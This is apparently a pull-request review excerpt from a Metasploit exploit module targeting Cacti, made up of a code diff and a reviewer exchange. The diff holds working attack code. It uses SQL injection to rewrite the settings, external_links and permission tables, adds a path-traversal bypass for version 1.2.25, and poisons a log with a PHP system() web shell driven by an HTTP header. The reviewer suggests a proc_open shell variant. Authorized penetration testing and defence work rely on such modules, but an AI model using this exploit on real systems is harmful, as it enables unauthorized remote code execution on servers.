modules/exploits/multi/http/cacti_pollers_sqli_rce.rb

```diff
@@ -0,0 +1,320 @@
+        sqli.raw_run_sql("if(id,sleep(#{datastore['SqliDelay']}),null) from external_links where id=#{@ext_link_id}")
+      end
+      break if elapsed_time < datastore['SqliDelay']
+
+      @ext_link_id = rand(1000..9999)
+    end
+    vprint_good("Got external link ID #{@ext_link_id}")
+  end
+
+  def exploit
+    # `#do_login` will take care of populating `@csrf_token` and `@cacti_version`
+    fail_with(Failure::NoAccess, 'Login failure') unless @logged_in || do_login
+
+    @log_file_path = "log/cacti#{rand(1..999)}.log"
+    print_status("Backing up the current log file path and adding a new path (#{@log_file_path}) to the `settings` table")
+    @log_setting_name_bak = '_path_cactilog'
+    sqli.raw_run_sql(";update settings set name='#{@log_setting_name_bak}' where name='path_cactilog'")
+    @do_settings_cleanup = true
+    sqli.raw_run_sql(";insert into settings (name,value) values ('path_cactilog','#{@log_file_path}')")
+
+    print_status("Inserting the log file path `#{@log_file_path}` to the external links table")
+    log_file_path_lfi = "../../#{@log_file_path}"
+    # Some specific path tarversal needs to be prepended to bypass the v1.2.25 fix in `link.php` (line 79):
+    #   $file = $config['base_path'] . "/include/content/" . str_replace('../', '', $page['contentfile']);
+    log_file_path_lfi = "....//....//#{@log_file_path}" if @cacti_version && Rex::Version.new(@cacti_version) == Rex::Version.new('1.2.25')
+    get_ext_link_id
+    sqli.raw_run_sql(";insert into external_links (id,sortorder,enabled,contentfile,title,style) values (#{@ext_link_id},2,'on','#{log_file_path_lfi}','Log-#{rand_text_numeric(3..5)}','CONSOLE')")
+    @do_ext_link_cleanup = true
+
+    print_status('Getting the user ID and setting permissions (it might take a few minutes)')
+    user_id = sqli.run_sql("select id from user_auth where username='#{datastore['USERNAME']}'")
+    fail_with(Failure::NotFound, 'User ID not found') unless user_id =~ (/\A\d+\Z/)
+    sqli.raw_run_sql(";insert into user_auth_realm (realm_id,user_id) values (#{10000 + @ext_link_id},#{user_id})")
+    @do_perms_cleanup = true
+
+    print_status('Logging again to apply new settings and permissions')
+    # Keep a copy of the cookie_jar and the CSRF token to be used later by the cleanup routine and remove all cookies to login again.
+    # This is required since this new session will block after triggering the payload and we won't be able to reuse it to cleanup.
+    cookie_jar_bak = cookie_jar.clone
+    cookie_jar.clear
+    csrf_token_bak = @csrf_token
+    # Setting `@csrf_token` to nil will force `#do_login` to get a fresh CSRF token
+    @csrf_token = nil
+    fail_with(Failure::NoAccess, 'Login failure') unless do_login
+
+    print_status('Poisoning the log')
+    header_name = rand_text_alpha(1).upcase
+    sqli.raw_run_sql(" and updatexml(rand(),concat(CHAR(60),'?=system($_SERVER[\\'HTTP_#{header_name}\\']);?>',CHAR(126)),null)")
```

Comment:
cacti [uses `proc_open`](https://github.com/search?q=repo%3ACacti%2Fcacti+proc_open&type=code) instead of `system` (meaning that the later could be disabled, while the former can't), so depending whether size of portability is prioritized, something like this could be used instead:

```suggestion
    phpshell = "$h=proc_open($_SERVER['HTTP_#{header_name}'],array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$p); $ret='';while(!feof($p[1])){$ret.=fread($p[1],1024);}@proc_close($h);echo $ret;'
    sqli.raw_run_sql(" and updatexml(rand(),concat(CHAR(60),'<?#{phpshell};?>',CHAR(126)),null)")
```

Reply:
That's a very good point. Unfortunately, the payload is truncated after 32 characters before being written to the log file. So, we are very limited in size and this payload was the smallest I found.